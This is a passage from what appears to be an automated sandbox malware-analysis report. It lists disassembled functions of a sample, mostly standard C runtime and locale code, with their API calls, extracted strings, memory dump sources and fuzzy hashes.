                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 48ad1aff258f7f7391fd6aa0a3c86b338e5d909e1896a33729a1a763741fcb22
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 9B414931920A06DFCB20DF65D684AAAF3F4FF1A310B50492AD457DB950DB30EEA5CB50
                                                                                                                                                                                                                                        Function 002BB8B2 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 74COMMONLIBRARYCODE
                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                        • FreeLibrary.KERNEL32(00000000,?,002BB9C1,002A34FA,?,00000000,002AA3DD,002A34FC,?,002BB596,00000022,FlsSetValue,002CE054,0-,002AA3DD), ref: 002BB973
                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000003.00000002.1775071275.00000000002A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002A0000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 00000003.00000002.1775052549.00000000002A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000003.00000002.1775102113.00000000002CB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000003.00000002.1775123962.00000000002D6000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000003.00000002.1775143365.00000000002DB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000003.00000002.1775161520.00000000002DD000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_3_2_2a0000_alexshlu.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: FreeLibrary
                                                                                                                                                                                                                                        • String ID: api-ms-$ext-ms-
                                                                                                                                                                                                                                        • API String ID: 3664257935-537541572
                                                                                                                                                                                                                                        • Opcode ID: 44bdcc1f2a0eee1f7612c9701c5d1baa20634ed4c511c7f606db4b2494d55059
                                                                                                                                                                                                                                        • Instruction ID: 8bb3f163646e87e1c31abbbed64bc652bf503c40eb1a92d7cd699f6586d42355
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 44bdcc1f2a0eee1f7612c9701c5d1baa20634ed4c511c7f606db4b2494d55059
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: E2210531E22616BBD7229F21EC85ADA3768DF417F0F250121EA15A72D0D7B0EE10CAE1
                                                                                                                                                                                                                                        Function 00427546 Relevance: 10.6, APIs: 1, Strings: 5, Instructions: 72fileCOMMON
                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                        • CopyFileW.KERNEL32(00000000,?,00000000), ref: 00427607
                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000003.00000002.1775218648.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_3_2_400000_alexshlu.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: CopyFile
                                                                                                                                                                                                                                        • String ID: <vB$B\$JC$OR$7Wu
                                                                                                                                                                                                                                        • API String ID: 1304948518-2341045906
                                                                                                                                                                                                                                        • Opcode ID: 534c61a23f16c94dd70e9183f09d5d618cb95d249a0f73e85ffe0a6b27bbc1d3
                                                                                                                                                                                                                                        • Instruction ID: 8ef9865115e3bd1ef4dc2c2120f56385b28599b8e62f1996c0c1473ca8bdbd32
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 534c61a23f16c94dd70e9183f09d5d618cb95d249a0f73e85ffe0a6b27bbc1d3
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 802180B964D340DFD3209F61A84671BBBF4FB86304F40582CE1D587291EB788515DB4A
                                                                                                                                                                                                                                        Function 002AB857 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 49COMMON
                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                        • __EH_prolog3.LIBCMT ref: 002AB85E
                                                                                                                                                                                                                                        • std::_Lockit::_Lockit.LIBCPMT ref: 002AB868
                                                                                                                                                                                                                                        • int.LIBCPMT ref: 002AB87F
                                                                                                                                                                                                                                          • Part of subcall function 002AA613: std::_Lockit::_Lockit.LIBCPMT ref: 002AA624
                                                                                                                                                                                                                                          • Part of subcall function 002AA613: std::_Lockit::~_Lockit.LIBCPMT ref: 002AA63E
                                                                                                                                                                                                                                        • codecvt.LIBCPMT ref: 002AB8A2
                                                                                                                                                                                                                                        • std::_Lockit::~_Lockit.LIBCPMT ref: 002AB8D9
                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000003.00000002.1775071275.00000000002A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002A0000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 00000003.00000002.1775052549.00000000002A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000003.00000002.1775102113.00000000002CB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000003.00000002.1775123962.00000000002D6000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000003.00000002.1775143365.00000000002DB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000003.00000002.1775161520.00000000002DD000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_3_2_2a0000_alexshlu.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: Lockitstd::_$Lockit::_Lockit::~_$H_prolog3codecvt
                                                                                                                                                                                                                                        • String ID: py-
                                                                                                                                                                                                                                        • API String ID: 3716348337-278015880
                                                                                                                                                                                                                                        • Opcode ID: dba0470d757bf0ac08118c788bfbd3276c1bf33611830861f6ae124fc3946a5e
                                                                                                                                                                                                                                        • Instruction ID: 8d850d3751d76758f3a4042c6656202da125f311a65c64c3d96755402f5ca393
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: dba0470d757bf0ac08118c788bfbd3276c1bf33611830861f6ae124fc3946a5e
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: F2012632C241199FCF05EF68D8556ADB779BF46324F14480AE40167282DF789E21CF91
                                                                                                                                                                                                                                        Function 002AE13C Relevance: 10.5, APIs: 3, Strings: 3, Instructions: 15libraryloaderCOMMON
                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                        • GetModuleHandleW.KERNEL32(kernel32.dll), ref: 002AE142
                                                                                                                                                                                                                                        • GetProcAddress.KERNEL32(00000000,GetSystemTimePreciseAsFileTime), ref: 002AE150
                                                                                                                                                                                                                                        • GetProcAddress.KERNEL32(00000000,GetTempPath2W), ref: 002AE161
                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000003.00000002.1775071275.00000000002A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002A0000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 00000003.00000002.1775052549.00000000002A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000003.00000002.1775102113.00000000002CB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000003.00000002.1775123962.00000000002D6000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000003.00000002.1775143365.00000000002DB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000003.00000002.1775161520.00000000002DD000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_3_2_2a0000_alexshlu.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: AddressProc$HandleModule
                                                                                                                                                                                                                                        • String ID: GetSystemTimePreciseAsFileTime$GetTempPath2W$kernel32.dll
                                                                                                                                                                                                                                        • API String ID: 667068680-1047828073
                                                                                                                                                                                                                                        • Opcode ID: 2103449a81373f7a349bdb4bb54455197791b4cc648fb741bc3655b5ffb13a7a
                                                                                                                                                                                                                                        • Instruction ID: 700035741b7d7bc86205dd0d63477a797a386e104c5dd6db236b7aa9eadc0881
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 2103449a81373f7a349bdb4bb54455197791b4cc648fb741bc3655b5ffb13a7a
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 65D0C976D67224AF8340EFB4FE0DD8A7BB4EB0E7523118523F905D2760EB748D148A96
                                                                                                                                                                                                                                        Function 002C38AD Relevance: 9.3, APIs: 6, Instructions: 292COMMONLIBRARYCODE
                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000003.00000002.1775071275.00000000002A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002A0000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 00000003.00000002.1775052549.00000000002A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000003.00000002.1775102113.00000000002CB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000003.00000002.1775123962.00000000002D6000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000003.00000002.1775143365.00000000002DB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000003.00000002.1775161520.00000000002DD000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_3_2_2a0000_alexshlu.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                        • Opcode ID: a4b127399a8ebdccafbcead12630ec078f7feab6ef1eefc808c646727befcd52
                                                                                                                                                                                                                                        • Instruction ID: 5d688dceaa04ccb42354ba0381f5a6502c488adfbe949c28194d58715452c3c1
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: a4b127399a8ebdccafbcead12630ec078f7feab6ef1eefc808c646727befcd52
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 83B11370E2424AAFDB11DF98D845FAEBBF1AF05314F148A5DE844A7282C7719E61CF60
                                                                                                                                                                                                                                        Function 002A5640 Relevance: 9.1, APIs: 2, Strings: 3, Instructions: 352COMMON
                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                        • _strlen.LIBCMT ref: 002A589C
                                                                                                                                                                                                                                        • Concurrency::cancel_current_task.LIBCPMT ref: 002A5A5B
                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000003.00000002.1775071275.00000000002A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002A0000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 00000003.00000002.1775052549.00000000002A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000003.00000002.1775102113.00000000002CB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000003.00000002.1775123962.00000000002D6000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000003.00000002.1775143365.00000000002DB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000003.00000002.1775161520.00000000002DD000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_3_2_2a0000_alexshlu.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: Concurrency::cancel_current_task_strlen
                                                                                                                                                                                                                                        • String ID: ,$false$true
                                                                                                                                                                                                                                        • API String ID: 575380510-760133229
                                                                                                                                                                                                                                        • Opcode ID: 03fd8d804508cf03905c1273a76cd06c5e556b4aabd9921c9447e288ae0a09d4
                                                                                                                                                                                                                                        • Instruction ID: 1e409b8c41c26d624ef3b5fd67bc4f70cc7cb512df847b51d26d015600d94a8b
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 03fd8d804508cf03905c1273a76cd06c5e556b4aabd9921c9447e288ae0a09d4
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 16C1D7B25183069FD310AF64CC85B6BB7E8EF91344F04492CF9958B242FB75D928CB92
                                                                                                                                                                                                                                        Function 002B9664 Relevance: 9.1, APIs: 6, Instructions: 60COMMONLIBRARYCODE
                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                        • GetLastError.KERNEL32(?,?,002B965B,002AEBD7,002AD9C8), ref: 002B9672
                                                                                                                                                                                                                                        • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 002B9680
                                                                                                                                                                                                                                        • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 002B9699
                                                                                                                                                                                                                                        • SetLastError.KERNEL32(00000000,002B965B,002AEBD7,002AD9C8), ref: 002B96EB
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000003.00000002.1775071275.00000000002A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002A0000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 00000003.00000002.1775052549.00000000002A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000003.00000002.1775102113.00000000002CB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000003.00000002.1775123962.00000000002D6000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000003.00000002.1775143365.00000000002DB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000003.00000002.1775161520.00000000002DD000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_3_2_2a0000_alexshlu.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: ErrorLastValue___vcrt_
                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                        • API String ID: 3852720340-0
                                                                                                                                                                                                                                        • Opcode ID: 610f484e1fef51732a1f89daaec48cd0c204647ae15559f1039c151697047f97
                                                                                                                                                                                                                                        • Instruction ID: 6f20f280f5f177a9d9e512f5d241f2d8109c95819a8beb980037dc706c953c20
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 610f484e1fef51732a1f89daaec48cd0c204647ae15559f1039c151697047f97
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 4F01B53263A722AE96252FB4BC4EAAB275CEB117F5720432AF661500F1EF52CCF19540
                                                                                                                                                                                                                                        Function 002B9F2C Relevance: 9.1, APIs: 2, Strings: 3, Instructions: 301COMMONLIBRARYCODE
                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                        • type_info::operator==.LIBVCRUNTIME ref: 002BA04B
                                                                                                                                                                                                                                        • CallUnexpected.LIBVCRUNTIME ref: 002BA2C4
                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000003.00000002.1775071275.00000000002A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002A0000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 00000003.00000002.1775052549.00000000002A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000003.00000002.1775102113.00000000002CB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000003.00000002.1775123962.00000000002D6000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000003.00000002.1775143365.00000000002DB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000003.00000002.1775161520.00000000002DD000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_3_2_2a0000_alexshlu.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: CallUnexpectedtype_info::operator==
                                                                                                                                                                                                                                        • String ID: csm$csm$csm
                                                                                                                                                                                                                                        • API String ID: 2673424686-393685449
                                                                                                                                                                                                                                        • Opcode ID: e794959d217a07218b82c42b6a22c080f5f465a6b5fbb0fe5dd47726aa27be7f
                                                                                                                                                                                                                                        • Instruction ID: 5a655065b5f090c08f284f49f3ac44fcfdac26eb474d47986e8fcb94ce56a283
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: e794959d217a07218b82c42b6a22c080f5f465a6b5fbb0fe5dd47726aa27be7f
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: C4B18C3182020AEFCF14DFA8C9819EEBBB5BF14390F14455AE9156B212D735DAB1CF92
                                                                                                                                                                                                                                        Function 002A3BE0 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 84COMMON
                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                        • std::_Lockit::_Lockit.LIBCPMT ref: 002A3BFC
                                                                                                                                                                                                                                        • std::_Lockit::_Lockit.LIBCPMT ref: 002A3C1A
                                                                                                                                                                                                                                        • std::_Lockit::~_Lockit.LIBCPMT ref: 002A3C3C
                                                                                                                                                                                                                                        • std::_Lockit::~_Lockit.LIBCPMT ref: 002A3CAA
                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000003.00000002.1775071275.00000000002A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002A0000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 00000003.00000002.1775052549.00000000002A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000003.00000002.1775102113.00000000002CB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000003.00000002.1775123962.00000000002D6000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000003.00000002.1775143365.00000000002DB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000003.00000002.1775161520.00000000002DD000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_3_2_2a0000_alexshlu.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: Lockitstd::_$Lockit::_Lockit::~_
                                                                                                                                                                                                                                        • String ID: ios_base::badbit set
                                                                                                                                                                                                                                        • API String ID: 593203224-3882152299
                                                                                                                                                                                                                                        • Opcode ID: b0b3bdbbc1439dfb7bdd6d7de90ec3127d63d463f9f577ea9bb59b4b4e8b1e33
                                                                                                                                                                                                                                        • Instruction ID: 9bba2307a96eb503a2b548c37baacb28616a4588a5c2414ac2ecd03175ee4dfc
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: b0b3bdbbc1439dfb7bdd6d7de90ec3127d63d463f9f577ea9bb59b4b4e8b1e33
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 1A21A071D182149FD710EF15E849A1AB3A1EB56724F01495EF4889B3A1EF34AE60CF92
                                                                                                                                                                                                                                        Function 002AA5A6 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 58COMMONLIBRARYCODE
                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                        • __EH_prolog3.LIBCMT ref: 002AA5AD
                                                                                                                                                                                                                                        • std::_Lockit::_Lockit.LIBCPMT ref: 002AA5BA
                                                                                                                                                                                                                                        • std::_Lockit::_Lockit.LIBCPMT ref: 002AA624
                                                                                                                                                                                                                                        • std::_Lockit::~_Lockit.LIBCPMT ref: 002AA63E
                                                                                                                                                                                                                                          • Part of subcall function 002A9CA8: _Yarn.LIBCPMT ref: 002A9CC8
                                                                                                                                                                                                                                          • Part of subcall function 002A9CA8: _Yarn.LIBCPMT ref: 002A9CEC
                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000003.00000002.1775071275.00000000002A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002A0000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 00000003.00000002.1775052549.00000000002A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000003.00000002.1775102113.00000000002CB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000003.00000002.1775123962.00000000002D6000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000003.00000002.1775143365.00000000002DB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000003.00000002.1775161520.00000000002DD000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_3_2_2a0000_alexshlu.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: Lockitstd::_$Lockit::_Yarn$H_prolog3Lockit::~_
                                                                                                                                                                                                                                        • String ID: bad locale name
                                                                                                                                                                                                                                        • API String ID: 3084819986-1405518554
                                                                                                                                                                                                                                        • Opcode ID: 11c105e993174107b69decc6215d65d82af9e7a6112b0a07509a54b55b475e0e
                                                                                                                                                                                                                                        • Instruction ID: 3af553b0a4827cc922da94e007db35de4fede5fe8aeaa181ef61ecdb39fb5eaf
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 11c105e993174107b69decc6215d65d82af9e7a6112b0a07509a54b55b475e0e
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: ED11D071825744DFC720DF6AD48168ABBE4FF29700F50496FE08AC3641DB70AA90CFA6
                                                                                                                                                                                                                                        Function 002B40E9 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 42libraryloaderCOMMONLIBRARYCODE
                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                        • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,BB40E64E,?,?,00000000,002CAD7A,000000FF,?,002B41AA,002B4091,?,002B4246,00000000), ref: 002B411E
                                                                                                                                                                                                                                        • GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 002B4130
                                                                                                                                                                                                                                        • FreeLibrary.KERNEL32(00000000,?,?,00000000,002CAD7A,000000FF,?,002B41AA,002B4091,?,002B4246,00000000), ref: 002B4152
                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000003.00000002.1775071275.00000000002A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002A0000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 00000003.00000002.1775052549.00000000002A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000003.00000002.1775102113.00000000002CB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000003.00000002.1775123962.00000000002D6000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000003.00000002.1775143365.00000000002DB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000003.00000002.1775161520.00000000002DD000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_3_2_2a0000_alexshlu.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: AddressFreeHandleLibraryModuleProc
                                                                                                                                                                                                                                        • String ID: CorExitProcess$mscoree.dll
                                                                                                                                                                                                                                        • API String ID: 4061214504-1276376045
                                                                                                                                                                                                                                        • Opcode ID: c7df588da4af804b74e43aee09cece0aa343e497dd9b697eddff33dde88f2a01
                                                                                                                                                                                                                                        • Instruction ID: b6b09784d75be9d6941b5f2184bffbb0c2e64dc68850ab3ca4df1e9c4b0ace3f
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: c7df588da4af804b74e43aee09cece0aa343e497dd9b697eddff33dde88f2a01
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: F901DF31D61619AFDB019F54EC48FEEBBB8FB04B11F044126E811A26A0CB749D00CA90
                                                                                                                                                                                                                                        Function 002BC086 Relevance: 7.7, APIs: 5, Instructions: 197COMMON
                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                        • __alloca_probe_16.LIBCMT ref: 002BC10B
                                                                                                                                                                                                                                        • __alloca_probe_16.LIBCMT ref: 002BC1D4
                                                                                                                                                                                                                                        • __freea.LIBCMT ref: 002BC23B
                                                                                                                                                                                                                                          • Part of subcall function 002BA8D1: HeapAlloc.KERNEL32(00000000,002AA3DD,002A34FA,?,002AECE1,002A34FC,002A34FA,?,?,?,002AA03F,002AA3DD,002A34FE,002A34FA,002A34FA,002A34FA), ref: 002BA903
                                                                                                                                                                                                                                        • __freea.LIBCMT ref: 002BC24E
                                                                                                                                                                                                                                        • __freea.LIBCMT ref: 002BC25B
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000003.00000002.1775071275.00000000002A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002A0000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 00000003.00000002.1775052549.00000000002A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000003.00000002.1775102113.00000000002CB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000003.00000002.1775123962.00000000002D6000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000003.00000002.1775143365.00000000002DB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000003.00000002.1775161520.00000000002DD000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_3_2_2a0000_alexshlu.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: __freea$__alloca_probe_16$AllocHeap
                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                        • API String ID: 1096550386-0
                                                                                                                                                                                                                                        • Opcode ID: d13198c22729e3965de21feb7ad4eb86d48163b7fe9b136c180c22d0d1b964ed
                                                                                                                                                                                                                                        • Instruction ID: 3249730c1d86981659a6255e2d89b97081cbacc89f9eb932551e39a92e815a88
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: d13198c22729e3965de21feb7ad4eb86d48163b7fe9b136c180c22d0d1b964ed
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 2451A47262024AAFEF219FA4CC45DFB36A9EF85790F250529FD08D6141EB70DD309AA0
                                                                                                                                                                                                                                        Function 002A9ECE Relevance: 7.5, APIs: 5, Instructions: 44COMMONLIBRARYCODE
                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                        • __EH_prolog3.LIBCMT ref: 002A9ED5
                                                                                                                                                                                                                                        • std::_Lockit::_Lockit.LIBCPMT ref: 002A9EE0
                                                                                                                                                                                                                                        • std::_Lockit::~_Lockit.LIBCPMT ref: 002A9F4E
                                                                                                                                                                                                                                          • Part of subcall function 002A9DA2: std::locale::_Locimp::_Locimp.LIBCPMT ref: 002A9DBA
                                                                                                                                                                                                                                        • std::locale::_Setgloballocale.LIBCPMT ref: 002A9EFB
                                                                                                                                                                                                                                        • _Yarn.LIBCPMT ref: 002A9F11
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000003.00000002.1775071275.00000000002A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002A0000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 00000003.00000002.1775052549.00000000002A0000.00000002.00000001.01000000.00000003.sdmpDownload File
